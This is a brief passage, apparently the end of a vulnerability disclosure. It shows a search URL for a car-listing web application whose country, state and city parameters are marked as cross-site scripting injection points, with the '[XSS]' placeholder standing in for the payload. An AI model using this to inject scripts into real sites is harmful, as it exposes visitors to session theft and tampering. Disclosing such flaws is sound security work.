/>https://website/carlisting/search.php?brand_id&#61;1&amp;model_id&#61;1&amp;car_condition&#61;New%20Car&amp;price_range&#61;1&amp;car_category_id&#61;1&amp;body_type_id&#61;1&amp;fuel_type_id&#61;1&amp;transmission_type_id&#61;2&amp;year&#61;2023&amp;mileage_start&#61;10&amp;mileage_end&#61;200&amp;country&#61;&#91;XSS&#93;&amp;state&#61;&#91;XSS&#93;&amp;city&#61;&#91;XSS&#93;<br /><br /><br /><br />&#91;-&#93; Done<br /></code></pre>